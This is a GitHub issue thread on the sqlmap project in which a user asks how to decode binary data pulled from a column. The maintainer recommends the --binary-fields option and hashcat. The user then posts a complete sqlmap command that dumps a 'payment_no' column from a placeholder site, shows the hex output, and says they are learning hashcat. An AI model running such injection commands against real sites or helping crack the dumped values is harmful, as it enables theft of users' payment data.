search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
32.56k stars 5.72k forks source link

Decode value in the column #2446

Closed AVR1234 closed 7 years ago

AVR1234 commented 7 years ago

HELLO

I need help to upgrade my experience

What parameters should be set in sqlmap or where to look for the key and method to decode the value in the column like \ x01 / 5ë \ x01 \ x9d \ x00 \ x931 \ x9bç \ x11 \ x88l \ x8fÂwà \ x80Wð¡ÁH¡ \ x96 \ x917r

Or tell me where you can read about it, and then I can not find, I'm all told that you need to know the engine of the site, but if the site is self-written, how to do it?

stamparm commented 7 years ago

Either false positive (if you are getting garbage with --banner too then rerun with --flush-session) or the column is a binary dump of (e.g.) password hashes. In that case rerun with --binary-fields (https://github.com/sqlmapproject/sqlmap/wiki/Usage#binary-content-retrieval) and do the hash cracking with some other tool (e.g. hashcat)

AVR1234 commented 7 years ago

Hello, thanks for reply ./sqlmap.py -u "https://www.site.com/info.php?id=43" --technique="U" --random-agent -D main -T user -C payment_no --dump --binary-fields=payment_no --stop=5 I got it:

| 005535066549871AC28DD8046A4AA45577E08057F0A1C148A196913772810DC1 | | 007CCA975D72887C57F5990BA53116CA77E08057F0A1C148A196913772810DC1 | | 007F24E42DAE9FA4B95FB9294DA7F7CC77E08057F0A1C148A196913772810DC1 | | 00B5E9248D8164236703E904A3A64CB077E08057F0A1C148A196913772810DC1 |

Now i am learning hashcat)))